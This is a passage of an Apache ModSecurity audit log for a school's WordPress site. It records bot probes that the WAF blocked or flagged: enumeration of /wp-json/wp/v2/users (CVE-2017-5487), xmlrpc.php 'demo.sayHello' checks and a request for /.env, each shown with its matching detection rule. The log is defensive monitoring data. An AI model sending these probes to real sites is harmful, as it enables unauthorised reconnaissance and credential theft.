[uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731584146690 1684 (- - -) Stopwatch2: 1746731584146690 1684; combined=632, p1=303, p2=296, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66bc8a5a-Z-- --9c70050a-A-- [09/May/2025:02:15:39 +0700] aB0C244K347NtBcwXKx2TwAAAI0 103.236.140.4 55600 103.236.140.4 8181 --9c70050a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c70050a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c70050a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731739659073 3370 (- - -) Stopwatch2: 1746731739659073 3370; combined=1439, p1=515, p2=893, p3=0, p4=0, p5=31, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c70050a-Z-- --a27e3b07-A-- [09/May/2025:02:15:43 +0700] aB0C344K347NtBcwXKx2UAAAAI8 103.236.140.4 55604 103.236.140.4 8181 --a27e3b07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a27e3b07-C-- demo.sayHello --a27e3b07-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a27e3b07-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746731743390493 17877 (- - -) Stopwatch2: 1746731743390493 17877; combined=29940, p1=445, p2=3013, p3=24, p4=24, p5=13230, sr=68, sw=69, l=0, gc=13135 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a27e3b07-Z-- --084bd353-A-- [09/May/2025:02:22:01 +0700] aB0EWSs5rYyn3jlLjjIrKQAAAM4 103.236.140.4 55798 103.236.140.4 8181 --084bd353-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --084bd353-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --084bd353-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746732121404503 2547 (- - -) Stopwatch2: 1746732121404503 2547; combined=1074, p1=365, p2=684, p3=0, p4=0, p5=25, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --084bd353-Z-- --82e60138-A-- [09/May/2025:02:22:05 +0700] aB0EXY4K347NtBcwXKx2UQAAAJg 103.236.140.4 55802 103.236.140.4 8181 --82e60138-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --82e60138-C-- demo.sayHello --82e60138-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --82e60138-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746732125706158 5441 (- - -) Stopwatch2: 1746732125706158 5441; combined=4070, p1=523, p2=3314, p3=28, p4=31, p5=101, sr=73, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82e60138-Z-- --3fc8c423-A-- [09/May/2025:02:22:08 +0700] aB0EYMP9GxxPAbCroFZCrwAAAEM 103.236.140.4 55806 103.236.140.4 8181 --3fc8c423-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fc8c423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fc8c423-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746732128117062 1946 (- - -) Stopwatch2: 1746732128117062 1946; combined=880, p1=303, p2=556, p3=0, p4=0, p5=21, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fc8c423-Z-- --8e9c355a-A-- [09/May/2025:02:22:12 +0700] aB0EZKcs1DvJ_HgMHE95_AAAABQ 103.236.140.4 55810 103.236.140.4 8181 --8e9c355a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.143 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e9c355a-C-- demo.sayHello --8e9c355a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e9c355a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746732132738679 5229 (- - -) Stopwatch2: 1746732132738679 5229; combined=3981, p1=521, p2=3253, p3=26, p4=28, p5=90, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e9c355a-Z-- --b40c5908-A-- [09/May/2025:02:23:04 +0700] aB0EmMP9GxxPAbCroFZCsQAAAFc 103.236.140.4 55814 103.236.140.4 8181 --b40c5908-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b40c5908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b40c5908-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746732184396515 3438 (- - -) Stopwatch2: 1746732184396515 3438; combined=1413, p1=473, p2=908, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b40c5908-Z-- --49704a40-A-- [09/May/2025:02:23:07 +0700] aB0Emys5rYyn3jlLjjIrKwAAAM8 103.236.140.4 55818 103.236.140.4 8181 --49704a40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --49704a40-C-- demo.sayHello --49704a40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --49704a40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746732187950071 4859 (- - -) Stopwatch2: 1746732187950071 4859; combined=3748, p1=490, p2=3054, p3=24, p4=28, p5=89, sr=91, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49704a40-Z-- --212a2358-A-- [09/May/2025:02:37:35 +0700] aB0H_6cs1DvJ_HgMHE96CgAAAAM 103.236.140.4 55886 103.236.140.4 8181 --212a2358-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.140.17.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.140.17.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --212a2358-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --212a2358-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746733055321480 2582 (- - -) Stopwatch2: 1746733055321480 2582; combined=1169, p1=379, p2=757, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --212a2358-Z-- --cbad6321-A-- [09/May/2025:02:43:24 +0700] aB0JXKcs1DvJ_HgMHE96EwAAABU 103.236.140.4 55932 103.236.140.4 8181 --cbad6321-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.165.207.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.165.207.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cbad6321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbad6321-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746733404015824 2942 (- - -) Stopwatch2: 1746733404015824 2942; combined=1327, p1=467, p2=831, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbad6321-Z-- --0bc13b62-A-- [09/May/2025:03:27:08 +0700] aB0TnFoC-7ITMWTA_c9yYgAAAMc 103.236.140.4 56258 103.236.140.4 8181 --0bc13b62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0bc13b62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bc13b62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746736028766141 3919 (- - -) Stopwatch2: 1746736028766141 3919; combined=1623, p1=541, p2=1043, p3=0, p4=0, p5=39, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bc13b62-Z-- --501c7e44-A-- [09/May/2025:03:27:11 +0700] aB0Tnx6q_ZMebht3q15KIgAAAJA 103.236.140.4 56262 103.236.140.4 8181 --501c7e44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --501c7e44-C-- demo.sayHello --501c7e44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --501c7e44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746736031969830 5648 (- - -) Stopwatch2: 1746736031969830 5648; combined=3964, p1=565, p2=3177, p3=25, p4=23, p5=99, sr=82, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --501c7e44-Z-- --47a42539-A-- [09/May/2025:03:35:27 +0700] aB0Vj1qQ1nOVx9fWpZS3RAAAAAo 103.236.140.4 56310 103.236.140.4 8181 --47a42539-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47a42539-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47a42539-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746736527260818 3081 (- - -) Stopwatch2: 1746736527260818 3081; combined=1238, p1=446, p2=767, p3=0, p4=0, p5=25, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47a42539-Z-- --e4958427-A-- [09/May/2025:03:35:32 +0700] aB0VlC-fAO47ojYKsMoLKwAAAEw 103.236.140.4 56314 103.236.140.4 8181 --e4958427-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4958427-C-- demo.sayHello --e4958427-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4958427-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746736532121975 5353 (- - -) Stopwatch2: 1746736532121975 5353; combined=3984, p1=532, p2=3232, p3=20, p4=24, p5=101, sr=77, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4958427-Z-- --00f99d14-A-- [09/May/2025:03:38:01 +0700] aB0WKR6q_ZMebht3q15KNgAAAJI 103.236.140.4 56388 103.236.140.4 8181 --00f99d14-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.204.126.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.204.126.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00f99d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00f99d14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746736681261483 3185 (- - -) Stopwatch2: 1746736681261483 3185; combined=1328, p1=455, p2=844, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00f99d14-Z-- --3953c426-A-- [09/May/2025:03:44:29 +0700] aB0XrR6q_ZMebht3q15KNwAAAJM 103.236.140.4 56448 103.236.140.4 8181 --3953c426-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.84.42.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.84.42.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3953c426-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3953c426-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746737069752127 3428 (- - -) Stopwatch2: 1746737069752127 3428; combined=1422, p1=478, p2=914, p3=0, p4=0, p5=30, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3953c426-Z-- --e8473374-A-- [09/May/2025:03:45:38 +0700] aB0X8i-fAO47ojYKsMoLPAAAAFI 103.236.140.4 56454 103.236.140.4 8181 --e8473374-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --e8473374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8473374-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file 